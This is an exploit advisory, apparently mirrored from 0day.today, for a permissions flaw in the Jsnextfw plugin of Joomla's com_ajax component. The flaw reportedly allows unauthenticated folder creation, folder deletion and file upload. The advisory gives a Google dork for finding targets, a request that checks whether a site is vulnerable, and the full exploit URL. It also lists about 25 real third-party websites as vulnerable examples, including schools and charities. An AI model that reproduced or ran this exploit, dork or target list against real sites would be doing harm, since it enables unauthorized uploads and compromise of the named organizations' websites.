Joomla Com_Ajax Component Jsnextfw Plugin Jform_Article Incorrect Default Permission Vulnerability

🗓️ 28 Oct 2018 00:00:00Reported by KingSkrupellosType

zdt🔗 0day.today👁 273 Views

Joomla Com_Ajax Component Jsnextfw Plugin Jform_Article Incorrect Default Permission Vulnerability on Windows and Linux. Medium risk. Allows creation, deletion, and file upload without admin permissions

# Exploit Title : Joomla Com_Ajax Component Jsnextfw Plugin Jform_Article Incorrect Default Permission Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/10/2018
# Vendor Homepage : joomla.org
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : inurl:/index.php?option=com_ajax
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] 
+ CWE-287 - [ Improper Authentication ] - CWE-399 - [ Resource Management Errors ]
+ CWE-20 -  [ Improper Input Validation ] - CWE-284 - [ Improper Access Control ]
+ CWE-306 - [ Missing Authentication for Critical Function ]

#################################################################################################

# Admin Panel Login Path => 

/administrator

# Check for Error Message and Vulnerability on the websites =>

/index.php?option=com_ajax&format=json
/PATH/index.php?option=com_ajax&format=json
/index.php/component/ajax/

{"success":true,"message":null,"messages":null,"data":null}

# Exploit => 

/index.php?option=com_ajax&format=html&plugin=jsnextfw&context=media-selector&type=image&folder=
images&6142fd345ac817417f35bde90a0ed787=1&editor=jform_articletext&tmpl=component

# Directory Path => /images/...

Note => 

# We can create a folder.
# We can Delete Folder[s]
# Upload a File without administration permissions.

#################################################################################################

# Example Vulnerable Sites =>

stpsahid.ac.id/index.php?option=com_ajax&format=html&plugin=jsnextfw&context=media-selector&type=image&folder=
images&6142fd345ac817417f35bde90a0ed787=1&editor=jform_articletext&tmpl=component

joomla.org/index.php?option=com_ajax&format=json => [ Proof of Concept ] => archive.is/77gHL

impostos.ad/index.php?option=com_ajax&format=json

bplimmobiliare.it/joomla/index.php?option=com_ajax&format=json

camntech.com/index.php?option=com_ajax&format=json

aavopl.org/index.php?option=com_ajax&format=json

burnetts-ea.com/index.php?option=com_ajax&format=json

driffieldschool.net/index.php?option=com_ajax&format=json

aspenoss.com/index.php?option=com_ajax&format=json

atrainability.co.uk/index.php?option=com_ajax&format=json

emotionfactory.com/index.php?option=com_ajax&format=json

felicitysarran.co.uk/index.php?option=com_ajax&format=json

accesstalent.co.uk/index.php?option=com_ajax&format=json

abc.org.uk/index.php?option=com_ajax&format=json

astonacademy.org/index.php?option=com_ajax&format=json

catholiceducation.org.uk/index.php?option=com_ajax&format=json

burystedmundsramblers.org.uk/index.php?option=com_ajax&format=json

pefc.org/index.php?option=com_ajax&format=json

learning-disability.org.uk/index.php?option=com_ajax&format=json

lesresidencesniable.com/index.php?option=com_ajax&format=json

smrt.bristol.sch.uk/index.php?option=com_ajax&format=json

flonflons.eu/index.php?option=com_ajax&format=json

keadventure.com/index.php?option=com_ajax&format=json

uzvonu.com/cs/?option=com_ajax&format=json

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

#  0day.today [2018-10-28]  #

28 Oct 2018 00:00Current

0.1Low risk

Vulners AI Score0.1